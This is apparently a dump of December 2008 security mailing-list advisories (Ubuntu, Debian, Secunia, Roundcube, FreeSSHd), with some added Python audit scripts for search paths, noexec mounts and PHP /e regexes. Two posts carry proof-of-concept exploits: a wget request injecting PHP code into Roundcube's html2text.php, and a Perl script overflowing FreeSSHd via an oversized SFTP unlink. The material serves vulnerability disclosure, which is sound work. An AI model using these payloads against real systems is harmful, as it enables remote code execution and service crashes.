===========================================================
Ubuntu Security Notice USN-698-1          December 22, 2008
nagios vulnerability
CVE-2008-5027
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  nagios-common                   2:1.3-cvs.20050402-8ubuntu8

After a standard system upgrade you need to restart Nagios to effect
the necessary changes.

Details follow:

It was discovered that Nagios did not properly parse commands submitted using
the web interface. An authenticated user could use a custom form or a browser
addon to bypass security restrictions and submit unauthorized commands.


Updated packages for Ubuntu 6.06 LTS:

From: Florian Weimer <fw@deneb.enyo.de>
Date: Sun, 21 Dec 2008 11:04:41 +0100
Subject: [SECURITY] [DSA 1678-2] New perl packages fix regression
To: bugtraq@securityfocus.com

------------------------------------------------------------------------
Debian Security Advisory DSA-1678-2                  security@debian.org
http://www.debian.org/security/                         Florian Weimer
December 21, 2008                   http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : perl
Vulnerability  : design flaws
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2008-5302 CVE-2008-5303
Debian Bug     : 286905 286922 479317

The perl update in DSA-1678-1 contains a regression which is triggered
by some Perl scripts which have changed into the directory tree
removed by File::Path::rmtree.  In particular, this happens if
File::Temp::tempdir is used.  This new update corrects this
regression.

For the stable distribution (etch), this problem has been fixed in
version 5.8.8-7etch6.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your perl packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
-------------------------------

  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

From: Secunia Research <remove-vuln@secunia.com>
Date: Sun, 21 Dec 2008 09:47:09 +0100
Subject: Secunia Research: Trend Micro HouseCall "notifyOnLoadNative()" Vulnerability
To: bugtraq@securityfocus.com

=====================================================================
                     Secunia Research 21/12/2008

    - Trend Micro HouseCall "notifyOnLoadNative()" Vulnerability -

=====================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

=====================================================================
1) Affected Software

* Trend Micro HouseCall ActiveX Control 6.51.0.1028 and 6.6.0.1278

NOTE: Other versions may also be affected.

=====================================================================
2) Severity

Rating: Highly critical
Impact: System compromise
Where:  Remote

=====================================================================
3) Vendor's Description of Software

"Trend Micro™ HouseCall is an application for checking whether your
computer has been infected by viruses, spyware, or other malware. 
HouseCall performs additional security checks to identify and fix 
vulnerabilities to prevent reinfection."

Product Link:
http://housecall.trendmicro.com/

=====================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Trend Micro 
HouseCall, which can be exploited by malicious people to compromise a 
user's system.

The vulnerability is caused by a use-after-free error in the HouseCall
ActiveX control (Housecall_ActiveX.dll). This can be exploited to 
dereference previously freed memory by tricking the user into opening 
a web page containing a specially crafted "notifyOnLoadNative()"
callback function.

Successful exploitation allows execution of arbitrary code.

=====================================================================
5) Solution

Remove the ActiveX control and install version 6.6.0.1285.
http://prerelease.trendmicro-europe.com/hc66/launch/

HouseCall Server Edition:
Apply hot fix B1285.

=====================================================================
6) Time Table

25/08/2008 - Vendor notified.
26/08/2008 - Vendor response.
21/12/2008 - Public disclosure.

=====================================================================
7) Credits

Discovered by Alin Rad Pop, Secunia Research.

=====================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2008-2435 for the vulnerability.

=====================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

=====================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-34/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================

From: Marc Deslauriers <marc.deslauriers@canonical.com>
Date: Mon, 22 Dec 2008 09:34:43 -0500
Subject: [USN-699-1] Blender vulnerabilities
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk

===========================================================
Ubuntu Security Notice USN-699-1          December 22, 2008
blender vulnerabilities
CVE-2008-1102, CVE-2008-4863
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  blender                         2.41-1ubuntu4.1

After a standard system upgrade you need to restart Blender to effect
the necessary changes.

Details follow:

It was discovered that Blender did not correctly handle certain malformed
Radiance RGBE images. If a user were tricked into opening a .blend file
containing a specially crafted Radiance RGBE image, an attacker could execute
arbitrary code with the user's privileges. (CVE-2008-1102)

It was discovered that Blender did not properly sanitize the Python search
path. A local attacker could execute arbitrary code by inserting a specially
crafted Python file in the Blender working directory. (CVE-2008-4863)


Updated packages for Ubuntu 6.06 LTS:

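Added example, not part of the USN-699-1 notice and not Blender's code: a Python audit of a module search path for the condition behind CVE-2008-4863, where an entry that resolves to the working directory lets a file placed there take the place of a real module. The `["", stdlib_dir]` path is an assumed model of an embedded interpreter's search path, and the planted `colorsys.py` is a constructed, harmless stand-in.

```python
import importlib
import importlib.machinery
import os
import stat
import tempfile


def risky_entries(search_path, cwd):
    """Return (entry, reason) for entries another local user could plant code in."""
    findings = []
    cwd_real = os.path.realpath(cwd)
    for entry in search_path:
        if entry == "":
            findings.append((entry, "empty entry: means the working directory"))
        elif not os.path.isabs(entry):
            findings.append((entry, "relative entry: resolved against the working directory"))
        elif os.path.realpath(entry) == cwd_real:
            findings.append((entry, "absolute entry that is the working directory"))
        else:
            try:
                mode = os.stat(entry).st_mode
            except OSError:
                continue  # a missing directory cannot supply modules
            if mode & stat.S_IWOTH:  # POSIX permission bits
                findings.append((entry, "world-writable directory"))
    return findings


def sanitized(search_path, cwd):
    """Return the search path with every risky entry dropped, order preserved."""
    bad = {entry for entry, _ in risky_entries(search_path, cwd)}
    return [entry for entry in search_path if entry not in bad]


def resolve_origin(module_name, search_path):
    """Report which file an import would load from search_path, without importing it."""
    importlib.invalidate_caches()
    spec = importlib.machinery.PathFinder.find_spec(module_name, search_path)
    return spec.origin if spec else None


def demo():
    """Show the same module name resolving differently before and after sanitizing."""
    stdlib_dir = os.path.dirname(os.__file__)
    old_cwd = os.getcwd()
    with tempfile.TemporaryDirectory() as workdir:
        os.chdir(workdir)
        try:
            cwd = os.getcwd()
            planted = os.path.join(cwd, "colorsys.py")
            with open(planted, "w") as fh:
                # Constructed stand-in for a file left by another local user.
                fh.write("# constructed placeholder, no behaviour\n")
            embedded_path = ["", stdlib_dir]  # assumed embedded-interpreter path
            findings = risky_entries(embedded_path, cwd)
            before = resolve_origin("colorsys", embedded_path)
            after = resolve_origin("colorsys", sanitized(embedded_path, cwd))
        finally:
            os.chdir(old_cwd)  # leave the temp dir before it is deleted
    return {"planted": planted, "before": before, "after": after,
            "findings": findings, "stdlib": stdlib_dir}


if __name__ == "__main__":
    result = demo()
    for entry, reason in result["findings"]:
        print(f"risky entry {entry!r}: {reason}")
    print("unsanitized path loads:", result["before"])
    print("sanitized path loads:  ", result["after"])
```

Run against a real interpreter, `risky_entries(sys.path, os.getcwd())` gives the same report for the live search path.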

From - Mon Dec 22 12:59:49 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000053f5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38998-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 5B847ED200
for <lists@securityspace.com>; Mon, 22 Dec 2008 12:59:30 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 35F9D14398D; Mon, 22 Dec 2008 09:55:15 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31897 invoked from network); 22 Dec 2008 14:20:53 -0000
Subject: [USN-698-2] Nagios3 vulnerabilities
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Date: Mon, 22 Dec 2008 09:36:42 -0500

===========================================================
Ubuntu Security Notice USN-698-2          December 22, 2008
nagios3 vulnerabilities
CVE-2008-5027, CVE-2008-5028
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  nagios3                         3.0.2-1ubuntu1.1

After a standard system upgrade you need to restart Nagios to effect
the necessary changes.

Details follow:

It was discovered that Nagios was vulnerable to a Cross-site request forgery
(CSRF) vulnerability. If an authenticated nagios user were tricked into
clicking a link on a specially crafted web page, an attacker could trigger
commands to be processed by Nagios and execute arbitrary programs. This
update alters Nagios behaviour by disabling submission of CMD_CHANGE commands.
(CVE-2008-5028)

It was discovered that Nagios did not properly parse commands submitted using
the web interface. An authenticated user could use a custom form or a browser
addon to bypass security restrictions and submit unauthorized commands.
(CVE-2008-5027)


Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.1.diff.gz
      Size/MD5:    38086 84020bf2660e52ef176a2274971e4c1b
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.1.dsc
      Size/MD5:     1644 868828fdabd748689e35083aa052a483
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2.orig.tar.gz
      Size/MD5:  2759331 008d71aac08660bc007f7130ea82ab80

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-common_3.0.2-1ubuntu1.1_all.deb
      Size/MD5:    72216 1cccb3e8640dbd2612caf7841ae1756b
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-doc_3.0.2-1ubuntu1.1_all.deb
      Size/MD5:  2063224 9769666c13c1d886228f66ff40dc729a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.1_amd64.deb
      Size/MD5:  2660164 381e889f994b102f6e65acc67f032f7a
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.1_amd64.deb
      Size/MD5:  1538712 8ce98eee89e13bc544180c73c9d24ba0

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.1_i386.deb
      Size/MD5:  2429130 87889b6dc28b86c4aae3d0acdd9950e9
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.1_i386.deb
      Size/MD5:  1387398 ec353697aced7539893ef9409d850120

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.1_lpia.deb
      Size/MD5:  2479724 433504296b1650a7d393ab28d9b264b7
    http://ports.ubuntu.com/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.1_lpia.deb
      Size/MD5:  1376480 be232a1c16b5daff63b586f2cd66b9eb

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.1_powerpc.deb
      Size/MD5:  2630802 167b533ea10d8962df5bc5904133c067
    http://ports.ubuntu.com/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.1_powerpc.deb
      Size/MD5:  1525154 0679044c20e6a53c9311f2670834035b

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.1_sparc.deb
      Size/MD5:  2327204 f40329c8a8216799a365d185bcc2a646
    http://ports.ubuntu.com/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.1_sparc.deb
      Size/MD5:  1379752 04408878bff9de5f485c7da2c6ffde4d




Date: Mon, 22 Dec 2008 10:55:49 +0100
From: Ubuntu Privacy Remix Team <security_notice@privacy-cd.org>
To: bugtraq@securityfocus.com
Subject: [UPRSN] Ubuntu Privacy Remix 8.04r2 introduces "noexec"-mounting
 by default

###########################################################

UPR Security Notice UPRSN-08_02           December 22, 2008

###########################################################

Ubuntu Privacy Remix (UPR), based on Ubuntu 8.04 (LTS), is a live,
read-only CD that seals off your private data from the outside world. It
does this using encryption and isolation methods. This method of booting
off a read-only CD provides an isolated and unmodifiable system that is
exceedingly difficult to compromise by spyware.

The following security issues affect the "Ubuntu Privacy Remix" releases
prior to 8.04_r2.

Ubuntu Privacy Remix 8.04_r2 can be downloaded from
https://www.privacy-cd.org/

A. UPR-specific
---------------
Removable media is mounted noexec by default.
This closes the possibility of infecting the running system with
malicious software executed from removable media formatted with vfat,
ntfs, ext2 or ext3.


B. Security Updates adopted from Ubuntu
---------------------------------------
All Ubuntu Updates and Security Updates released since the last
UPR-release until 20081219 are added.
--

---------

Ubuntu Privacy Remix Project
web:            www.privacy-cd.org
mail:            info@privacy-cd.org
bugreports:        https://bugs.launchpad.net/upr
signing_key:        1E8E7D6A | Fingerprint: C87A 673C 4EDD F7CC 5C89 4B77 7AC5 2496 1E8E 7D6A
communication_key:    85AC2E72 | Fingerprint: 83A9 0DE1 17B1 F74B 8E1A 0353 29E6 DD3E 85AC 2E72

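
One way to check the setting this notice describes, as an added example that is not part of the UPR announcement: it parses /proc/mounts-format text and reports removable-media mounts of the listed file systems that still permit execution. The /media and /mnt prefixes, the fuseblk entry and the function names are assumptions, and the sample lines are constructed.

```python
import re

# File systems the notice names for removable media. "fuseblk" is added as an
# assumption: NTFS volumes mounted through ntfs-3g appear under that type.
REMOVABLE_FS = {"vfat", "ntfs", "ext2", "ext3", "fuseblk"}

# Assumption: removable media are mounted below these directories.
REMOVABLE_PREFIXES = ("/media/", "/mnt/")

# Constructed sample in /proc/mounts format (device, mount point, type, options).
SAMPLE_MOUNTS = r"""/dev/sda1 / ext3 rw,errors=remount-ro 0 0
/dev/sdb1 /media/usb\040stick vfat rw,nosuid,nodev,uid=1000 0 0
/dev/sdc1 /media/backup ext3 rw,nosuid,nodev,noexec 0 0
/dev/sdd1 /media/win fuseblk rw,nosuid,nodev,allow_other 0 0
"""


def unescape(field):
    """Decode the octal escapes /proc/mounts uses (\\040 is a space)."""
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)


def exec_allowed_mounts(mounts_text):
    """Return (device, mount point, fstype) for removable mounts without noexec."""
    findings = []
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed or empty line
        device, mount_point, fstype, options = fields[:4]
        mount_point = unescape(mount_point)
        if fstype not in REMOVABLE_FS:
            continue
        if not mount_point.startswith(REMOVABLE_PREFIXES):
            continue
        # Compare whole option tokens so a substring inside another option
        # value cannot be mistaken for the noexec flag.
        if "noexec" not in options.split(","):
            findings.append((device, mount_point, fstype))
    return findings


if __name__ == "__main__":
    for device, mount_point, fstype in exec_allowed_mounts(SAMPLE_MOUNTS):
        print(f"exec allowed: {device} on {mount_point!r} ({fstype})")
```

On a live system the same function can be fed the contents of /proc/mounts. noexec blocks direct execution of files on the volume; a script can still be run by passing it to an interpreter that lives elsewhere.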

Date: Mon, 22 Dec 2008 09:27:17 +0100 (CET)
From: thijs@debian.org (Thijs Kinkhorst)
Subject: [SECURITY] [DSA 1691-1] New moodle packages fix several vulnerabilities
To: bugtraq@securityfocus.com

------------------------------------------------------------------------
Debian Security Advisory DSA-1691-1                  security@debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
December 22, 2008                     http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : moodle
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-3555 CVE-2008-1502 CVE-2008-3325 CVE-2008-3326
                 CVE-2008-4796 CVE-2008-4810 CVE-2008-4811 CVE-2008-5432
Debian Bugs    : 432264 471158 489533 492492 504235 504345 508593

Several remote vulnerabilities have been discovered in Moodle, an online
course management system. The following issues are addressed in this
update, ranging from cross site scripting to remote code execution.

Various cross site scripting issues in the Moodle codebase
(CVE-2008-3326, CVE-2008-3325, CVE-2007-3555, CVE-2008-5432,
MSA-08-0021, MDL-8849, MDL-12793, MDL-11414, MDL-14806,
MDL-10276).

Various cross site request forgery issues in the Moodle codebase
(CVE-2008-3325, MSA-08-0023).

Privilege escalation bugs in the Moodle codebase (MSA-08-0001, MDL-7755).

SQL injection issue in the hotpot module (MSA-08-0010).

An embedded copy of Smarty had several vulnerabilities
(CVE-2008-4811, CVE-2008-4810).
An embedded copy of Snoopy was vulnerable to cross site scripting
(CVE-2008-4796).
An embedded copy of Kses was vulnerable to cross site scripting
(CVE-2008-1502).

For the stable distribution (etch), these problems have been fixed in
version 1.6.3-2+etch1.

For the unstable distribution (sid), these problems have been fixed in
version 1.8.2.dfsg-2.

We recommend that you upgrade your moodle (1.6.3-2+etch1) package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch1.diff.gz
    Size/MD5 checksum:    24019 d29c179786ca1dcadf232c5e9a601362
  http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3.orig.tar.gz
    Size/MD5 checksum:  7465709 2f9f3fcf83ab0f18c409f3a48e07eae2
  http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch1.dsc
    Size/MD5 checksum:      793 d9a1fceaf316b608709be372d97e667a

Architecture independent packages:

  http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch1_all.deb
    Size/MD5 checksum:  6592474 9a5fb5924faa639952c3171665bc347d


  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

Date: Mon, 22 Dec 2008 13:13:32 +0100
From: Jacobo Avariento Gimeno <advisories@sofistic.net>
To: bugtraq@securityfocus.com
Subject: POC for CVE-2008-5619 (roundcubemail PHP arbitrary code injection)


Public Release Date of POC: 2008-12-22
Author: Jacobo Avariento Gimeno (Sofistic)
CVE id: CVE-2008-5619
Bugtraq id: 32799
Severity: Critical
Vulnerability reported by: RealMurphy


Intro
----
Roundcube Webmail is a browser-based IMAP client that uses the
"chuggnutt.com HTML to Plain Text Conversion" library to convert
HTML text to plain text; this library uses the preg_replace PHP
function in an insecure manner.

Vulnerable versions:
Round Cube RoundCube Webmail 0.2-3 beta
Round Cube RoundCube Webmail 0.2-1 alpha (tested)


Analysis of the vulnerable code
----
The script bin/html2text.php creates an instance of the class html2text
with the given POST data; the problem arises in the file
program/lib/html2text.php in function _convert() on line 381:

        // Run our defined search-and-replace
        $text = preg_replace($this->search, $this->replace, $text);

Some patterns in $this->search allow PHP code to be interpreted using the "e"
flag, i.e.:
'/<a [^>]*href=("|\')([^"\']+)\1[^>]*>(.+?)<\/a>/ie', // <a href="">
'/<b[^>]*>(.+?)<\/b>/ie',                // <b>
'/<th[^>]*>(.+?)<\/th>/ie',              // <th> and </th>

Concretely, those would be replaced by:
'$this->_build_link_list("\\2", "\\3")', // <a href="">
'strtoupper("\\1")',                    // <b>
"strtoupper(\"\t\t\\1\n\")",            // <th> and </th>

Now using PHP complex (curly) syntax we can take advantage of this to
interpret arbitrary PHP code, evaluating PHP code embedded inside
strings.


Proof of Concept
----
As this vulnerability was discovered in the wild
(http://trac.roundcube.net/ticket/1485618), I was quite sure that it would be
exploitable. Using PHP curly syntax we can execute phpinfo():

wget -q --header="Content-Type: ''" \
-O - --post-data='<b>{${phpinfo()}}</b>' \
--no-check-certificate \
http://127.0.0.1/roundcubemail-0.2-alpha/bin/html2text.php

Using PHP curly syntax plus some tricks to bypass PHP magic_quotes_gpc
(to avoid using single or double quotes), arbitrary shell command
execution is fully feasible. As this vulnerability was discovered last
week, no more details will be published yet; more info will be available
at http://sofistic.net.



-- 
 Jacobo Avariento Gimeno
 IT Security Department @ Sofistic
 Your security, our concern!
 http://sofistic.net
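
An audit helper for the pattern class this post analyses, added here and not part of the original post: it scans PHP source for regex string literals carrying the "e" modifier, inspecting the literals themselves because, as in html2text, the patterns can sit in an array far from the preg_replace call. It goes beyond the three quoted patterns by accepting any PCRE delimiter; the function names are hypothetical and the sample PHP is constructed from the patterns quoted above.

```python
import re

# Modifier letters PHP's PCRE functions accept after the closing delimiter.
PHP_MODIFIERS = set("imsxeADSUXJu")
# Bracket-style delimiters close with a different character.
CLOSERS = {"(": ")", "[": "]", "{": "}", "<": ">"}

# A PHP single- or double-quoted string literal, honouring backslash escapes.
# Heuristic: quote characters inside PHP comments are not recognised as such.
STRING_LITERAL = re.compile(
    r"'((?:[^'\\]|\\.)*)'" + r'|"((?:[^"\\]|\\.)*)"', re.S
)

# Constructed sample modelled on the patterns quoted in the post.
SAMPLE_PHP = r"""<?php
$search = array(
    '/<a [^>]*href=("|\')([^"\']+)\1[^>]*>(.+?)<\/a>/ie', // link
    '/<b[^>]*>(.+?)<\/b>/ie',                             // bold
    '/<th[^>]*>(.+?)<\/th>/ie',                           // table header
    '/<br[^>]*>/i',                                       // no e modifier
    "/(&nbsp;|\s)+/",                                     // no modifiers
);
$text = preg_replace($search, $replace, $text);
"""


def split_regex(literal):
    """Return (pattern, modifiers) if the literal looks like a delimited
    PCRE pattern, otherwise None."""
    text = literal.lstrip()
    if len(text) < 2:
        return None
    opener = text[0]
    # PCRE delimiters may not be alphanumeric, whitespace or a backslash.
    if opener.isalnum() or opener.isspace() or opener == "\\":
        return None
    closer = CLOSERS.get(opener, opener)
    end = text.rfind(closer)
    if end <= 0:
        return None
    modifiers = text[end + 1:].strip()
    if any(ch not in PHP_MODIFIERS for ch in modifiers):
        return None
    return text[1:end], modifiers


def find_eval_regexes(php_source):
    """Return (line number, modifiers, literal) for every string literal
    that parses as a regex with the 'e' (evaluate replacement) modifier."""
    findings = []
    for match in STRING_LITERAL.finditer(php_source):
        literal = match.group(1) if match.group(1) is not None else match.group(2)
        parsed = split_regex(literal)
        if parsed and "e" in parsed[1]:
            line_no = php_source.count("\n", 0, match.start()) + 1
            findings.append((line_no, parsed[1], literal))
    return findings


if __name__ == "__main__":
    for line_no, modifiers, literal in find_eval_regexes(SAMPLE_PHP):
        print(f"line {line_no}: modifiers '{modifiers}': {literal}")
```

Hits are candidates for review, since a path-like string such as '/tmp/e' also matches. The replacement for a confirmed hit is preg_replace_callback, which hands the captured text to a function as data; PHP deprecated the e modifier in 5.5 and removed it in 7.0.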

Date: Mon, 22 Dec 2008 00:42:59 -0700
From: writ3r-dont-want-bugtraq-spam-@gmail.com
To: bugtraq@securityfocus.com
Subject: FreeSSHd Multiple Remote Stack Overflow Vulnerabilities

# FreeSSHd Multiple Remote Stack Overflow Vulnerabilities. 
#
# Version : 1.2.1
# Advisory: http://www.bmgsec.com.au/advisory/42/
#
# Discovered & written by: 
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
#
# After Jeremy Brown reported similar buffer overflow vulnerabilities in
# FreeSSHd I forgot about it, and stopped my research on the vulnerabilities.
# Anyway just now I noticed that other vulnerable functions had not been
# reported. So below is a small list, and a small proof of concept. 

# Note: All below functions overwrite EDI register. 
# open (edi)
# unlink (edi)
# mkdir (edi)
# rmdir (edi)
# stat (edi)

use Net::SSH2;

my $user = "root";
my $pass = "yahh";

my $ip = "127.0.0.1";
my $port = 22;

my $ssh2 = Net::SSH2->new();

print "[+] Connecting...\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
$ssh2->auth_password($user, $pass) || die "[-] Incorrect credentials\n";
print "[+] Sending payload\n";

my $payload = "A" x 5000;
print $payload;

my $sftp = $ssh2->sftp();
$sftp->unlink($payload);

print "[+] Sent";
$ssh2->disconnect;

Subject: [USN-697-1] Imlib2 vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Date: Mon, 22 Dec 2008 09:35:17 -0500

===========================================================
Ubuntu Security Notice USN-697-1          December 22, 2008
imlib2 vulnerability
CVE-2008-2426
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libimlib2                       1.2.1-2ubuntu0.4

Ubuntu 7.10:
  libimlib2                       1.3.0.0debian1-4ubuntu0.2

Ubuntu 8.04 LTS:
  libimlib2                       1.4.0-1ubuntu1.2

After a standard system upgrade you need to restart any applications that
use Imlib2 to effect the necessary changes.

Details follow:

It was discovered that Imlib2 did not correctly handle certain malformed XPM
and PNG images. If a user were tricked into opening a specially crafted image
with an application that uses Imlib2, an attacker could cause a denial of
service and possibly execute arbitrary code with the user's privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1-2ubuntu0.4.diff.gz
      Size/MD5:   112004 40358c580aa8df51d351dd6e7f5a16c8
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1-2ubuntu0.4.dsc
      Size/MD5:      753 5420a8a79b55140d8e24db8f2de00dd6
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1.orig.tar.gz
      Size/MD5:   911360 deb3c9713339fe9ca964e100cce42cd1

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.4_amd64.deb
      Size/MD5:   352146 b50aee75d96a48b69302db0b41ae17ad
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.4_amd64.deb
      Size/MD5:   214740 b699d7ceafc603c4da9c42325732e076

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.4_i386.deb
      Size/MD5:   302668 ebf21b1c1a22e4802a18c82f59de28e8
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.4_i386.deb
      Size/MD5:   193408 34bfcc6c8dc0986f44e06ec5d7410665

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.4_powerpc.deb
      Size/MD5:   342046 295d87aa13c311a74cd344c0f073af6d
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.4_powerpc.deb
      Size/MD5:   212958 93c174a40fc7d88d48a70f5fdb09a3f5

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.4_sparc.deb
      Size/MD5:   318588 e21dc5553e88054dfd9010cc898181f9
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.4_sparc.deb
      Size/MD5:   194098 fbe1c22aad50c8258c140c67dd85894d

Updated packages for Ubuntu 7.10:

  Source archives:

